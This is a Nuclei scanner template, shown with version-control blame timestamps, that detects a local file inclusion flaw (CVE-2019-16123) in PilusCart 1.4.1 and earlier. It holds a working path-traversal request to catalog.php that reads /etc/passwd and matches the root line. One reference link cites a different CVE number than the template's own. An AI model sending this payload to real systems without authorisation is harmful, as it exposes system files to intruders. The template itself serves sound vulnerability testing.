2021-10-30 21:48:32 +00:00
|
|
|
id: CVE-2019-16123
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-10-30 21:48:32 +00:00
|
|
|
info:
|
2022-06-14 15:06:10 +00:00
|
|
|
name: PilusCart <=1.4.1 - Local File Inclusion
|
2021-10-30 21:48:32 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-06-20 17:28:52 +00:00
|
|
|
description: |
|
|
|
|
PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.
|
2021-10-30 21:48:32 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://www.exploit-db.com/exploits/47315
|
2022-06-14 15:06:10 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-1653
|
2021-10-30 21:48:32 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2019-16123
|
|
|
|
cwe-id: CWE-22
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: piluscart,lfi,packetstorm,edb,cve,cve2019
|
2021-10-30 21:48:32 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "root:[x*]:0:0"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-14 15:06:10 +00:00
|
|
|
|
2022-06-17 16:22:38 +00:00
|
|
|
# Enhanced by mp on 2022/06/17
|